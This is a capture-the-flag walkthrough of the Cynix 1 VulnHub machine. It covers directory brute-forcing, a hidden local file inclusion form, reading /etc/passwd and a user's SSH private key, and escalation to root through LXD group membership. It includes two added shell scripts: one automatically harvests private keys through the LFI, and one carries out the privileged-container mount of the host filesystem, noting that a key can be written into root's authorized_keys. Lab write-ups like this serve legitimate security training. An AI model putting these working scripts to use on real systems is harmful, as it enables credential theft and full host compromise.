
This is the Cynix 1 vulnhub walkthrough for the Cynix 1 vulnerable Linux box found on vulnhub.com, enjoy.

You will need Burp Suite Community Edition. I laid out in another post how to set up Burp and FoxyProxy, which makes the Burp setup process much easier.

Cynix 1 is a great VulnHub box. I think it ties together tough web enumeration and a unique privilege escalation method nicely in one challenging, realistic, OSCP-like machine.

Recon

Nmap is the first tool to run for initial recon. Ports 80 (HTTP) and 6688 (SSH on a non-standard port) are open. Because SSH is not on 22, scan all TCP ports rather than only the default list, or a service like this is easy to miss. HTTP and SSH are both services I will inspect and hopefully exploit soon.

80, 6688 open

I also run AutoRecon and look at its output for clues.

How To Do Web Enumeration

Running gobuster, dirsearch, and AutoRecon locates some basic but uninteresting endpoints.

I tried dirsearch, gobuster, and AutoRecon. None of them found the hidden endpoint. So the next tool to try was DirBuster, which I started by typing dirbuster in a terminal.

dirbuster Page 1

I cycled through several wordlists until this one pulled up the lavalamp endpoint, a hidden directory that we nonetheless have access to. The difference was the wordlist, not the tool: lavalamp simply was not in the lists the other tools were fed.

dirbuster Page 2

You can see that DirBuster is pretty handy for this type of mindless directory busting, as long as you keep swapping wordlists.

So looking at the exposed webpage there is a fully functional site with a Contact tab. Take a look.

Next I will use Burp. But first there is a small detail that will completely trip you up unless you notice it and adjust.

Visit the page over HTTPS, or you will see TLS certificate errors.

To capture the request you must submit the contact form from https://10.0.0.245/lavalamp/#section-contact; submitting from the plain HTTP site fails with TLS issues. Also make sure Burp's CA certificate is trusted by the browser first, otherwise the browser stops on a certificate warning instead of sending the proxied HTTPS request.

Put in whatever and hit submit; let's capture the server response.

How To Use Burp Suite

It was for this reason that I thought to try the HTTPS version instead and it worked like a charm.

Capture the response from the server for the request sent by the contact form submission.

Grab the request and send it to Repeater.

The server's response is unusual: it contains a reference to a new endpoint that the directory brute-forcing missed.

The element is hidden purely with CSS. Once you change its opacity (transparency) value from 0 to 1 (anything above 1 is clamped to fully opaque, so 100 works too) the header box is filled with text asking for an input.

The input takes a filename-like parameter, and that could indicate a local file inclusion (LFI) vulnerability: a hidden control is not a security control, it only stops casual users from finding the field.

LFI 1 - Cynix 1 Vulnhub Walkthrough

Let's test it by asking the server for the contents of /etc/passwd. It is the classic LFI proof because it is world-readable on every Linux host and its contents are unmistakable, and it doubles as a list of the real user accounts on the box.

LFI 2 - Cynix 1 Vulnhub Walkthrough

Exploit To Get A Shell

Here is the thinking on getting a shell on Cynix 1, remember how there is an SSH service running on TCP 6688?

That means we can use the LFI to read the user's .ssh directory and look for a private key (id_rsa). The key can be used to authenticate to the SSH server as that user, provided it was saved without a passphrase.

In this case the user is ford (one of the accounts with a real home directory and shell in /etc/passwd). Save the key locally, restrict its permissions (ssh refuses a key that is group- or world-readable), and connect on the non-default port: chmod 600 id_rsa; ssh -i id_rsa -p 6688 ford@10.0.0.245. This works and gives a shell.
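The steps above (a CSS-hidden form, an LFI parameter, /etc/passwd, and a user's private key) chained into one script, as an added example that is not code from the original walkthrough. It assumes things the page does not name: that the LFI endpoint is https://10.0.0.245/lavalamp/index.php and that the file path travels in a GET parameter called file. Change LFI_URL and LFI_PARAM to whatever you captured in Burp. The parsing helpers take their input on stdin so they work on constructed data as well as on live responses.

```shell
#!/bin/sh
# Added example, not the walkthrough's own code.
# ASSUMED (not on the page): endpoint and parameter name of the LFI.
LFI_URL="${LFI_URL:-https://10.0.0.245/lavalamp/index.php}"
LFI_PARAM="${LFI_PARAM:-file}"

# Flag HTML lines that hide an element with CSS (opacity 0, display none,
# visibility hidden). This is how the Cynix contact form was tucked away.
hidden_elements() {
    grep -n -i -E 'opacity: *0([^.0-9]|$)|display: *none|visibility: *hidden'
}

# Fetch one file through the LFI. -k because the box has a self-signed cert.
lfi_fetch() {
    curl -sk --max-time 10 "${LFI_URL}?${LFI_PARAM}=$1"
}

# From /etc/passwd on stdin, print users with a home under /home and an
# interactive shell (drops system accounts and nologin/false shells).
passwd_users() {
    awk -F: '$6 ~ /^\/home\// && $7 !~ /(nologin|false)$/ { print $1 }'
}

# Key paths worth trying per user: id_rsa is what this box uses, but newer
# OpenSSH defaults to ed25519, so try that as well.
key_candidates() {
    for u in "$@"; do
        printf '/home/%s/.ssh/id_rsa\n/home/%s/.ssh/id_ed25519\n' "$u" "$u"
    done
}

# Pull just the PEM block out of a response that may wrap it in HTML.
extract_private_key() {
    sed -n '/-----BEGIN [A-Z ]*PRIVATE KEY-----/,/-----END [A-Z ]*PRIVATE KEY-----/p'
}

# Full chain: passwd -> users -> candidate keys -> key files saved with
# mode 600 so ssh will accept them (ssh -i key_ford_id_rsa -p 6688 ford@host).
harvest_keys() {
    users=$(lfi_fetch /etc/passwd | passwd_users)
    [ -n "$users" ] || { echo "no users parsed; is the LFI parameter right?" >&2; return 1; }
    for path in $(key_candidates $users); do
        key=$(lfi_fetch "$path" | extract_private_key)
        if [ -n "$key" ]; then
            out="key_$(echo "$path" | cut -d/ -f3)_$(basename "$path")"
            printf '%s\n' "$key" > "$out"
            chmod 600 "$out"
            echo "saved $path -> $out"
        fi
    done
}

# Only talk to the target when invoked as: sh harvest.sh run
if [ "${1:-}" = "run" ]; then
    harvest_keys
fi
```

Run `curl -sk URL | hidden_elements` first to spot CSS-hidden form fields in a page you have already brute-forced; once the LFI parameter is confirmed with /etc/passwd, `sh harvest.sh run` does the rest. If a key is passphrase-protected the file will still be saved, but ssh will prompt for the passphrase.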

ford is a user we will exploit!

I issue the command and get a shell.

Privilege Escalation

I run LinEnum.sh and check the output.

Cynix 1 Vulnhub Walkthrough - LXD Privilege Escalation

So what the heck is lxd and why would someone be in the lxd group?

LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.

It's image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.

The core of LXD is a privileged daemon which exposes a REST API over a local unix socket.

Installing lxd is similar to installing Docker, except that lxd adds the current user to the lxd group. The lxd daemon runs as root and its unix socket is the only authorization boundary, so anyone who can talk to the socket, meaning anyone in the lxd group, is effectively root on the host. The LXD documentation itself warns that membership in the lxd group is equivalent to root access. LinEnum flagging our user in that group is therefore the privilege escalation path.

So here is the idea: start a privileged container that mounts the host's root filesystem, then read and write the host as root from inside it. To do that we first need a minimal container image to import.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

The builder needs root (hence sudo) and drops a .tar.gz image tarball in the current directory. Host that file with a web server on the attacking machine, for example python3 -m http.server, and fetch it on the target with wget.

Move the gzipped file to the target and let’s run through an lxc import and container startup to escalate privileges.

Exploiting lxd means importing the image, creating a container from it with security.privileged=true, attaching the host's / as a disk device inside the container, and starting it.

Now exec into the container, change to the mount point I supplied for the host filesystem, and read the root flag from the host's /root directory.
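The lxd escalation written out as a checked sequence of lxc commands, an added example rather than the walkthrough's own commands. Assumed (not stated on the page): the Alpine tarball was uploaded to the target as ./alpine.tar.gz, the lxc client is on PATH, and the container is named privesc with the host filesystem mounted at /mnt/root. The command list is built by a separate function so it can be inspected or dry-run with LXC="echo lxc" before anything touches the daemon.

```shell
#!/bin/sh
# Added example, not the walkthrough's own code. Run on the target as the
# user that LinEnum showed in the lxd group.
LXC="${LXC:-lxc}"    # set LXC="echo lxc" to dry-run

# The whole trick depends on lxd group membership. Group changes only apply
# to new logins, so if /etc/group lists you but id does not, log in again.
in_lxd_group() {
    id -nG | tr ' ' '\n' | grep -qx lxd
}

# Build the command sequence (one per line) for a tarball, image alias,
# container name and host mount point. Pure, so it can be tested offline.
lxd_privesc_plan() {
    tarball=$1 img=$2 ctr=$3 mnt=$4
    printf '%s\n' \
        "$LXC image import $tarball --alias $img" \
        "$LXC init $img $ctr -c security.privileged=true" \
        "$LXC config device add $ctr hostroot disk source=/ path=$mnt recursive=true" \
        "$LXC start $ctr"
}

# Execute the plan, then open a root shell in the container. The host's
# filesystem is visible under $mnt, so the host's /root is $mnt/root.
lxd_privesc() {
    tarball=${1:-./alpine.tar.gz} img=${2:-alpine} ctr=${3:-privesc} mnt=${4:-/mnt/root}
    in_lxd_group || { echo "not in the lxd group; this path will not work" >&2; return 1; }
    # Caveat: if "lxc init" reports that no storage pool exists, run
    # "lxd init" first, accept the defaults, then rerun this function.
    while IFS= read -r cmd; do
        echo "+ $cmd" >&2
        eval "$cmd" || return 1
    done <<EOF
$(lxd_privesc_plan "$tarball" "$img" "$ctr" "$mnt")
EOF
    $LXC exec "$ctr" -- /bin/sh -c "ls -la $mnt/root; exec /bin/sh"
}

# Usage: sh lxd_privesc.sh run [tarball] [alias] [container] [mountpoint]
if [ "${1:-}" = "run" ]; then
    shift
    lxd_privesc "$@"
fi
```

From the shell that opens, `cat /mnt/root/root/*` reads the flag; because the mount is the real host filesystem, writing to it (for instance copying a key into /mnt/root/root/.ssh/authorized_keys) also lands on the host as root. When you are done, `lxc stop` and `lxc delete` the container so the privileged mount does not linger.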

root is mine!

That’s it for the Cynix 1 vulnhub walkthrough!
